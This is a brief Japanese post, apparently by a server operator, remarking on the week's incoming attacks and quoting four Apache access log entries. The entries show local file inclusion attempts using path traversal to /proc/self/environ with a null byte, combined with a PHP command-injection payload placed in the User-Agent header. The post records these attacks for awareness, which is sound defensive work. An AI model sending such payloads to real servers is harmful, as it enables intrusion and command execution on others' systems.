今週はこのような攻撃がきていますね。
apacheのアカウント情報と環境を調べているようです。
201.25.53.34 - - [12/Dec/2011:03:08:22 +0900] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 262 "-" "<?php system(\"id\"); ?>" 201.25.53.34 - - [12/Dec/2011:03:08:22 +0900] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 262 "-" "<?php system(\"id\"); ?>" 201.25.53.34 - - [12/Dec/2011:03:08:23 +0900] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 262 "-" "<?php system(\"id\"); ?>" 201.25.53.34 - - [12/Dec/2011:03:08:23 +0900] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "<?php system(\"id\"); ?>"